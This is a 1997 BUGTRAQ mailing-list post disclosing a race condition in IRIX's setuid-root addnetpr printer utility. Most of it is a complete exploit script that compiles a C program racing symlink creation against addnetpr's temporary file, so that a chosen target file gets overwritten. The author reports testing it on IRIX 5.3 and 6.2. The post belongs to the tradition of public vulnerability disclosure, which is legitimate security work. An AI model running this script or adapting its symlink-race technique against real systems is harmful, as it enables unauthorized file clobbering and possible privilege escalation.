IRIX addnetpr race condition

Date: Fri, 9 May 1997 06:33:46 +0900
From: Jaechul Choe <poison@COSMOS.KAIST.AC.KR>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Irix: misc


Wow, your works are so fertile and wonderful.
Let me add some stuffs

[. . .]


There was the same race condition in the program, /usr/lib/addnetpr, 
another
suid root program for print.
Here is the exploit script for it.
But though I tried, it was hard to find the way to get root with it.
It can fill the target with the two argument of addnetpr, but with some
messages unable to control.
And it will prompt the window asking root passwd to non-privilegedd(not 
root,
but irix-specific privileged) users.
Privileged users bypass the window and can run the race.

Tested both IRIX 5.3 and 6.2

---------------)<-----------cut expnetpr.sh 
---------------)<----------------

#!/bin/sh

PROG="`basename $0`"
if [ $# -ne 1 ]; then
        echo "Usage: $PROG <target>"
        exit 1
fi

cat > expnetpr.c << _CREDIT_TO_ZOMO_
void main(int argc, char *argv[])
{
        char *template = "/var/tmp/printersXXXXXX";
        char *target;
        int pid;

        target = (char *)mktemp(template);

        if ((pid = fork()) > 0) {
                sleep(3);
                umask(0);
                execl("/usr/lib/addnetpr", "addnetpr", "localhost","+", 
0);
        }
        else
                while(1) {
                        symlink(argv[1], target);
                        unlink(target);
                }

}
_CREDIT_TO_ZOMO_
/bin/cc expnetpr.c -o expnetpr
if [ ! -f expnetpr ]; then
        echo "Couldn't compile expnetpr.c, lame! \nMake sure that C 
compiler has
 been installed from the IDO"
        exit 1
fi

while(`true`)
do
        ./expnetpr $1&
        PID=$!
        sleep 15
        ls -al $1
        killall expnetpr
        killall addnetpr
done

--------------------)<------------ cut 
---------------)<-------------------